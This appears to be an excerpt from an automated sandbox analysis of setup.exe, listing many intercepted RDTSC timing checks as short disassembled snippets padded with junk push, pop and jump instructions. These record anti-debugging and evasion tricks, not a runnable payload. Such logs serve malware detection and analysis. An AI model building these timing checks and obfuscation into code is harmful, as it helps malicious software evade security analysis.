Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9C7BE3 second address: 9C7BE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CD838 second address: 9CD852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820DA5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CD9C4 second address: 9CD9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CDB98 second address: 9CDBC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA9h 0x00000007 jg 00007FBA24820DA2h 0x0000000d jns 00007FBA24820D96h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CDCEF second address: 9CDD27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FBA2516CD4Fh 0x0000000b popad 0x0000000c pop ebx 0x0000000d ja 00007FBA2516CD66h 0x00000013 jmp 00007FBA2516CD56h 0x00000018 push ebx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CDE96 second address: 9CDE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CDE9B second address: 9CDEC3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA2516CD58h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FBA2516CD46h 0x00000010 jno 00007FBA2516CD46h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CDEC3 second address: 9CDEC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C13F second address: 97C153 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C153 second address: 97C159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C159 second address: 97C15D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 97C15D second address: 97C199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FBA24820DA8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FBA24820D9Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CE300 second address: 9CE31F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FBA2516CD59h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CE31F second address: 9CE323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CEC48 second address: 9CEC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9CEC4C second address: 9CEC57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9D75C5 second address: 9D75E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FBA2516CD53h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9D75E4 second address: 9D7600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007FBA24820DAFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9D568E second address: 9D5692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9D5BFA second address: 9D5C3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA24820DA7h 0x0000000a push eax 0x0000000b jmp 00007FBA24820DA3h 0x00000010 jmp 00007FBA24820D9Ch 0x00000015 pop eax 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9D5C3A second address: 9D5C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9D5C46 second address: 9D5C4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9D5C4C second address: 9D5C5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jc 00007FBA2516CD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9D62A8 second address: 9D62AE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9D7012 second address: 9D7023 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DBE78 second address: 9DBEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FBA24820D9Fh 0x0000000a jmp 00007FBA24820DA5h 0x0000000f pushad 0x00000010 jo 00007FBA24820D96h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBA24820DA3h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DBEC4 second address: 9DBED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA2516CD46h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DBED2 second address: 9DBED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DF256 second address: 9DF25F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DF6B8 second address: 9DF6BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DF6BD second address: 9DF6F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA2516CD55h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FBA2516CD4Ch 0x00000014 pushad 0x00000015 popad 0x00000016 jl 00007FBA2516CD46h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DF6F2 second address: 9DF6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DFA99 second address: 9DFAA4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DFAA4 second address: 9DFAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DFAA9 second address: 9DFAAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9DFAAE second address: 9DFADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push ecx 0x00000008 jc 00007FBA24820D96h 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 jbe 00007FBA24820DB0h 0x00000019 jmp 00007FBA24820D9Ch 0x0000001e je 00007FBA24820D9Eh 0x00000024 push esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E7CA2 second address: 9E7CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA2516CD59h 0x0000000a pop ebx 0x0000000b jbe 00007FBA2516CD69h 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FBA2516CD46h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E7CCF second address: 9E7CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E7E3D second address: 9E7E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FBA2516CD46h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f jne 00007FBA2516CD46h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push edi 0x0000001b pop edi 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E7F96 second address: 9E7F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E7F9A second address: 9E7F9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E7F9E second address: 9E7FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E7FA6 second address: 9E7FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FBA2516CD46h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBA2516CD58h 0x00000015 jng 00007FBA2516CD46h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E7FD4 second address: 9E7FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E8AF9 second address: 9E8AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E8AFF second address: 9E8B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E8B04 second address: 9E8B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FBA2516CD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E8B0E second address: 9E8B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E91B1 second address: 9E91E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FBA2516CD59h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FBA2516CD57h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E91E7 second address: 9E91EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9E7185 second address: 9E718A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9EED4C second address: 9EED50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9EED50 second address: 9EED54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9FBCF1 second address: 9FBCFB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBA24820D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9FBCFB second address: 9FBD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007FBA2516CD46h 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9FB99B second address: 9FB9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9FB9A1 second address: 9FB9BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA2516CD57h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 9FF510 second address: 9FF52D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820D9Fh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jns 00007FBA24820D96h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A111C5 second address: A111C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A111C9 second address: A111ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBA24820DA5h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A19634 second address: A1963F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A1963F second address: A1966A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007FBA24820D96h 0x0000000c jne 00007FBA24820D96h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a jmp 00007FBA24820DA1h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A17EE3 second address: A17EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A17EE9 second address: A17EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A1802E second address: A18036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A18036 second address: A18047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FBA24820D9Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A1DB51 second address: A1DB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FBA2516CD53h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A276C4 second address: A276D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FBA24820D96h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A276D2 second address: A276EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A276EF second address: A276F4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A2C156 second address: A2C166 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A2C166 second address: A2C186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820DA8h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A2C186 second address: A2C18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A30821 second address: A3083D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA24820DA7h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A32122 second address: A3213A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FBA2516CD46h 0x0000000c popad 0x0000000d popad 0x0000000e pushad 0x0000000f push esi 0x00000010 jl 00007FBA2516CD46h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A42A44 second address: A42A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBA24820D96h 0x00000009 jnp 00007FBA24820D96h 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5ACC8 second address: A5ACD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FBA2516CD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5AF95 second address: A5AF9F instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBA24820D96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5AF9F second address: A5AFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5AFA8 second address: A5AFB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5AFB4 second address: A5AFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBA2516CD46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5AFBE second address: A5AFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FBA24820DA6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5B349 second address: A5B35C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5B776 second address: A5B77E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5B8D9 second address: A5B8DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5D26C second address: A5D272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5D272 second address: A5D284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Dh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5FD68 second address: A5FD6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5FE14 second address: A5FE1E instructions: 0x00000000 rdtsc 0x00000002 je 00007FBA2516CD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A5FE1E second address: A5FE23 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A60134 second address: A60138 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A60138 second address: A6013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A6013E second address: A60144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A60144 second address: A60148 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A60148 second address: A6014C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A631C6 second address: A631CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A62D9B second address: A62DAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA2516CD4Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: A64CDC second address: A64CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA24820DA4h 0x00000009 jc 00007FBA24820D96h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48B006C second address: 48B008E instructions: 0x00000000 rdtsc 0x00000002 mov edi, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FBA2516CD4Eh 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, 5F50h 0x00000016 mov eax, edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 48E0F2C second address: 48E0F32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
